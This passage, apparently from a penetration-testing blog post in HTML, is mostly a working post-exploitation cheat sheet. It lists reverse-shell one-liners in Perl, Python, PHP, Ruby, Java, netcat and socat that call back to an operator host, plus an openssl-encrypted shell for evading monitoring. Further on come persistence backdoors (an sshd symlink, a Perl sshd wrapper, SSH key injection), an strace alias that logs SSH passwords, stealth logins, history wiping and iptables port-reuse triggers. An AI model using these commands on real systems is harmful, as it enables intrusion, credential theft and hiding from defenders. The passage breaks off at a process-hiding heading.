&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nv"&gt;perl&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nv"&gt;e&lt;/span&gt; &lt;span class="p"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&amp;gt;&amp;amp;S");open(STDOUT,"&amp;gt;&amp;amp;S");open(STDERR,"&amp;gt;&amp;amp;S");exec("/bin/sh -i");};&lt;/span&gt;&lt;span class="p"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  URL-Encoded Perl: Linux
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Python
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/bin/sh&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-i&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;]);&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  PHP
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="n"&gt;php&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="s1"&gt;'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &amp;lt;&amp;amp;3 &amp;gt;&amp;amp;3 2&amp;gt;&amp;amp;3");'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Ruby
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ruby"&gt;&lt;code&gt;&lt;span class="n"&gt;ruby&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;rsocket&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="s1"&gt;'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &amp;lt;&amp;amp;%d &amp;gt;&amp;amp;%d 2&amp;gt;&amp;amp;%d",f,f,f)'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Netcat without -e #1
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;mkfifo&lt;/code&gt; function merely creates a FIFO file; a named pipe must be used to open it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;rm&lt;/span&gt; /tmp/f&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/f&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;cat&lt;/span&gt; /tmp/f | /bin/sh &lt;span class="nt"&gt;-i&lt;/span&gt; 2&amp;gt;&amp;amp;1 | nc 10.0.0.1 1234 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/f
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Netcat without -e #2
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Java
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight java"&gt;&lt;code&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getRuntime&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;exec&lt;/span&gt;&lt;span class="o"&gt;([&lt;/span&gt;&lt;span class="s"&gt;"/bin/bash"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="s"&gt;"-c"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="s"&gt;"exec 5&amp;lt;&amp;gt;/dev/tcp/10.0.0.1/2002;cat &amp;lt;&amp;amp;5 | while read line; do \$line 2&amp;gt;&amp;amp;5 &amp;gt;&amp;amp;5; done"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; &lt;span class="n"&gt;as&lt;/span&gt; &lt;span class="nc"&gt;String&lt;/span&gt;&lt;span class="o"&gt;[]);&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;waitFor&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Xterm
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;xterm &lt;span class="nt"&gt;-display&lt;/span&gt; 10.0.0.1:1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exec
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;0&amp;lt;&amp;amp;196&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nb"&gt;exec &lt;/span&gt;196&amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/dev/tcp/&amp;lt;your_vps&amp;gt;/1024&lt;span class="p"&gt;;&lt;/span&gt; sh &amp;lt;&amp;amp;196 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&amp;amp;196 2&amp;gt;&amp;amp;196
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Consider:&lt;/strong&gt; If during penetration testing one discovers that the target environment cannot establish a reverse shell, and only ports 80 and 443 are open, while traffic is intercepted when attempting a reverse shell via whitelisted ports, how should one respond?&lt;/p&gt;

&lt;p&gt;One may attempt to encrypt the data packets to evade traffic monitoring devices.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Generate an SSL certificate public/private key pair on the VPS:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openssl req &lt;span class="nt"&gt;-x509&lt;/span&gt; &lt;span class="nt"&gt;-newkey&lt;/span&gt; rsa:4096 &lt;span class="nt"&gt;-keyout&lt;/span&gt; key.pem &lt;span class="nt"&gt;-out&lt;/span&gt; cert.pem &lt;span class="nt"&gt;-days&lt;/span&gt; 365 &lt;span class="nt"&gt;-nodes&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 2:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Listen for the reverse shell on the VPS:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openssl s_server &lt;span class="nt"&gt;-quiet&lt;/span&gt; &lt;span class="nt"&gt;-key&lt;/span&gt; key.pem &lt;span class="nt"&gt;-cert&lt;/span&gt; cert.pem &lt;span class="nt"&gt;-port&lt;/span&gt; 443
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 3:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Connect:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkfifo&lt;/span&gt; /tmp/excalibra&lt;span class="p"&gt;;&lt;/span&gt;/bin/bash &lt;span class="nt"&gt;-i&lt;/span&gt; &amp;lt; /tmp/excalibra 2&amp;gt;&amp;amp;1 | openssl s_client &lt;span class="nt"&gt;-quiet&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; 1.1.1.1:443 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /tmp/excalibra
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Obtain shell:  &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbp3f2epk7myta5d485p0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbp3f2epk7myta5d485p0.png" alt=" " width="798" height="176"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;However, one will notice that this shell is not particularly usable, lacking basic command completion.&lt;/p&gt;

&lt;p&gt;Solution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'import pty; pty.spawn("/bin/bash")'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;pty&lt;/code&gt; is a pseudo-terminal module.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;pty&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;spawn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[,&lt;/span&gt; &lt;span class="n"&gt;master_read&lt;/span&gt;&lt;span class="p"&gt;[,&lt;/span&gt; &lt;span class="n"&gt;stdin_read&lt;/span&gt;&lt;span class="p"&gt;]])&lt;/span&gt;
&lt;span class="n"&gt;Spawn&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;connect&lt;/span&gt; &lt;span class="n"&gt;its&lt;/span&gt; &lt;span class="n"&gt;controlling&lt;/span&gt; &lt;span class="n"&gt;terminal&lt;/span&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;current&lt;/span&gt; &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s standard I/O. This is often used to baffle programs which insist on reading from the controlling terminal.

The functions master_read and stdin_read should be functions which read from a file descriptor. The defaults try to read 1024 bytes each time they are called.

Changed in version 3.4: spawn() now returns the status value from os.waitpid() on the child process.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sometimes after privilege escalation, the terminal may exhibit similar issues; this method generally resolves them. Alternatively, refer to the link below.&lt;/p&gt;

&lt;h3&gt;
  
  
  Socat
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;socat file:&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="nb"&gt;tty&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;,raw,echo&lt;span class="o"&gt;=&lt;/span&gt;0 tcp-listen:9999

Upload socat to the target machine, &lt;span class="k"&gt;then &lt;/span&gt;execute:
socat &lt;span class="nb"&gt;exec&lt;/span&gt;:&lt;span class="s1"&gt;'bash -li'&lt;/span&gt;,pty,stderr,setsid,sigint,sane tcp:111.111.111.111:9999
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This also yields an interactive shell.&lt;/p&gt;

&lt;h2&gt;
  
  
  0X02 Persistence Techniques
&lt;/h2&gt;

&lt;h3&gt;
  
  
  SSH Backdoor
&lt;/h3&gt;

&lt;h4&gt;
  
  
  SSH Soft Link
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;ln&lt;/span&gt; &lt;span class="nt"&gt;-sf&lt;/span&gt; /usr/sbin/sshd /tmp/su&lt;span class="p"&gt;;&lt;/span&gt; /tmp/su &lt;span class="nt"&gt;-oPort&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;5555&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create a soft link and then access the SSH service via port 5555.&lt;/p&gt;

&lt;p&gt;Add a user:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;useradd excalibra &lt;span class="nt"&gt;-p&lt;/span&gt; excalibra
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When connecting via SSH, any password can be entered; during Kali testing, even the root user worked.&lt;/p&gt;

&lt;p&gt;For the specific principle, see &lt;a href="http://www.91ri.org/16803.html" rel="noopener noreferrer"&gt;An Investigation of PAM Triggered by a Linux Backdoor&lt;/a&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  SSH Wrapper
&lt;/h4&gt;

&lt;p&gt;Exploit:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; /usr/sbin/
&lt;span class="nb"&gt;mv &lt;/span&gt;sshd ../bin/
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'#!/usr/bin/perl'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;sshd
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;sshd
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;sshd
&lt;span class="nb"&gt;chmod &lt;/span&gt;u+x sshd
/etc/init.d/sshd restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then connect:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;socat STDIO TCP4:target_ip:22,sourceport&lt;span class="o"&gt;=&lt;/span&gt;13377
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Principle:  &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;init first starts /usr/sbin/sshd; when the script reaches &lt;code&gt;getpeername&lt;/code&gt;, the regular expression fails to match, so it proceeds to the next line, launching /usr/bin/sshd — the original sshd. The original sshd listens on the port, and after establishing a TCP connection, it forks a child process to handle specific tasks. This child process, without any further checks, directly executes the system's default /usr/sbin/sshd, returning control to the script. At this point, the child process's standard input and output have been redirected to the socket, so &lt;code&gt;getpeername&lt;/code&gt; can genuinely obtain the client's TCP source port. If the port matches 19526, it executes &lt;code&gt;sh&lt;/code&gt; to provide a shell.&lt;br&gt;&lt;br&gt;
From &lt;a href="https://www.anquanke.com/post/id/155943#h2-9" rel="noopener noreferrer"&gt;https://www.anquanke.com/post/id/155943#h2-9&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  SSH Key Injection
&lt;/h4&gt;

&lt;p&gt;First, generate an SSH key locally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh-keygen &lt;span class="nt"&gt;-t&lt;/span&gt; rsa
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then transmit the public key &lt;code&gt;id_rsa.pub&lt;/code&gt; to the target.&lt;/p&gt;

&lt;p&gt;At the same time, assign appropriate permissions, but they must not be overly permissive:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;600 ~/.ssh/authorized_keys
&lt;span class="nb"&gt;chmod &lt;/span&gt;700 ~/.ssh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  SSH Keylogger
&lt;/h4&gt;

&lt;p&gt;Append to the end of the current user's configuration file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;alias &lt;/span&gt;&lt;span class="nv"&gt;ssh&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'strace -o /tmp/sshpwd-`date    '&lt;/span&gt;+%d%h%m%s&lt;span class="s1"&gt;'`.log -e read,write,connect  -s2048 ssh'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  OpenSSH Rootkit
&lt;/h4&gt;

&lt;p&gt;This requires environmental dependencies to be installed, making it less practical. For reference, see &lt;a href="https://www.cnblogs.com/bigdevilking/p/9535427.html" rel="noopener noreferrer"&gt;Leveraging OpenSSH Backdoor to Hijack root Password&lt;/a&gt;.&lt;/p&gt;

&lt;h4&gt;
  
  
  SSH Stealth Login
&lt;/h4&gt;

&lt;p&gt;Stealth login allows logging into the system without being detected by commands such as &lt;code&gt;last&lt;/code&gt;, &lt;code&gt;who&lt;/code&gt;, or &lt;code&gt;w&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh &lt;span class="nt"&gt;-T&lt;/span&gt; username@host /bin/bash &lt;span class="nt"&gt;-i&lt;/span&gt;

ssh &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;UserKnownHostsFile&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/dev/null &lt;span class="nt"&gt;-T&lt;/span&gt; user@host /bin/bash &lt;span class="nt"&gt;-if&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Linux Hiding Techniques
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Simple File Hiding
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;touch&lt;/span&gt; .excalibra.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One may conceal malicious files within various directories.&lt;/p&gt;

&lt;h4&gt;
  
  
  Hidden Permissions
&lt;/h4&gt;

&lt;p&gt;The &lt;code&gt;chattr&lt;/code&gt; command can be used to apply a 'lock' to a file to prevent its deletion; we can exploit this.&lt;/p&gt;

&lt;h4&gt;
  
  
  Concealing Command History
&lt;/h4&gt;

&lt;p&gt;After obtaining a shell, enable 'incognito mode' by disabling the command history recording function.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;set&lt;/span&gt; +o &lt;span class="nb"&gt;history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Restore with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;set&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nb"&gt;history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once restored, command history is recorded normally.  &lt;/p&gt;

&lt;h4&gt;
  
  
  Deleting Specific Command History
&lt;/h4&gt;

&lt;p&gt;Delete designated historical records:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s2"&gt;"100,&lt;/span&gt;&lt;span class="nv"&gt;$d&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; .bash_history
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This removes command lines from line 100 onwards.&lt;/p&gt;

&lt;h4&gt;
  
  
  Port Reuse
&lt;/h4&gt;

&lt;h5&gt;
  
  
  Sharing SSH and HTTPS on the Same Port via SSLH
&lt;/h5&gt;

&lt;p&gt;A tool for sharing SSH and HTTPS on the same port on Linux: SSLH&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Install SSLH
apt &lt;span class="nb"&gt;install &lt;/span&gt;sslh
Configure SSLH
 Edit the SSLH configuration file:
 &lt;span class="nb"&gt;sudo &lt;/span&gt;vi /etc/default/sslh
 1. Locate the line: &lt;span class="nv"&gt;Run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;no  and change it to: &lt;span class="nv"&gt;Run&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;yes
 &lt;/span&gt;2. Modify the following line to allow SSLH to listen on port 443 on all available interfaces
  &lt;span class="nv"&gt;DAEMON_OPTS&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"&lt;/span&gt;
  service sslh start
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The environment is Docker; port 444 corresponds to the target's port 443.&lt;br&gt;&lt;br&gt;
Test successful.&lt;/p&gt;
&lt;h5&gt;
  
  
  iptables
&lt;/h5&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Port reuse chain&lt;/span&gt;
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-N&lt;/span&gt; LETMEIN
&lt;span class="c"&gt;# Port reuse rule&lt;/span&gt;
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat  &lt;span class="nt"&gt;-A&lt;/span&gt; LETMEIN &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;-j&lt;/span&gt; REDIRECT &lt;span class="nt"&gt;--to-port&lt;/span&gt; 22
&lt;span class="c"&gt;# Activation trigger&lt;/span&gt;
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;-m&lt;/span&gt; string &lt;span class="nt"&gt;--string&lt;/span&gt; &lt;span class="s1"&gt;'threathuntercoming'&lt;/span&gt; &lt;span class="nt"&gt;--algo&lt;/span&gt; bm &lt;span class="nt"&gt;-m&lt;/span&gt; recent &lt;span class="nt"&gt;--set&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; letmein &lt;span class="nt"&gt;--rsource&lt;/span&gt; &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
&lt;span class="c"&gt;# Deactivation trigger&lt;/span&gt;
iptables &lt;span class="nt"&gt;-A&lt;/span&gt; INPUT &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;-m&lt;/span&gt; string &lt;span class="nt"&gt;--string&lt;/span&gt; &lt;span class="s1"&gt;'threathunterleaving'&lt;/span&gt; &lt;span class="nt"&gt;--algo&lt;/span&gt; bm &lt;span class="nt"&gt;-m&lt;/span&gt; recent &lt;span class="nt"&gt;--name&lt;/span&gt; letmein &lt;span class="nt"&gt;--remove&lt;/span&gt; &lt;span class="nt"&gt;-j&lt;/span&gt; ACCEPT
&lt;span class="c"&gt;# let's do it&lt;/span&gt;
iptables &lt;span class="nt"&gt;-t&lt;/span&gt; nat &lt;span class="nt"&gt;-A&lt;/span&gt; PREROUTING &lt;span class="nt"&gt;-p&lt;/span&gt; tcp &lt;span class="nt"&gt;--dport&lt;/span&gt; 80 &lt;span class="nt"&gt;--syn&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; recent &lt;span class="nt"&gt;--rcheck&lt;/span&gt; &lt;span class="nt"&gt;--seconds&lt;/span&gt; 3600 &lt;span class="nt"&gt;--name&lt;/span&gt; letmein &lt;span class="nt"&gt;--rsource&lt;/span&gt; &lt;span class="nt"&gt;-j&lt;/span&gt; LETMEIN
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Exploit:&lt;/p&gt;

&lt;p&gt;TIPS: When testing with Docker&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-ti&lt;/span&gt; &lt;span class="nt"&gt;--privileged&lt;/span&gt; ubuntu:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;--privileged&lt;/code&gt; parameter is essential.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Activate reuse&lt;/span&gt;
&lt;span class="nb"&gt;echo &lt;/span&gt;threathuntercoming | socat - tcp:192.168.19.170:80
&lt;span class="c"&gt;# SSH login using port 80&lt;/span&gt;
ssh &lt;span class="nt"&gt;-p&lt;/span&gt; 80 root@192.168.19.170:
&lt;span class="c"&gt;# Deactivate reuse&lt;/span&gt;
&lt;span class="nb"&gt;echo &lt;/span&gt;threathunterleaving | socat - tcp:192.168.19.170:80
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There also exist ICMP-based exploitation methods. The original article:&lt;br&gt;&lt;br&gt;
&lt;a href="https://www.freebuf.com/articles/network/137683.html" rel="noopener noreferrer"&gt;Remotely Controlling iptables for Port Reuse&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Process Hiding
&lt;/h4&gt;
&lt;h5&gt;
  
  
  libprocesshider
&lt;/h5&gt;

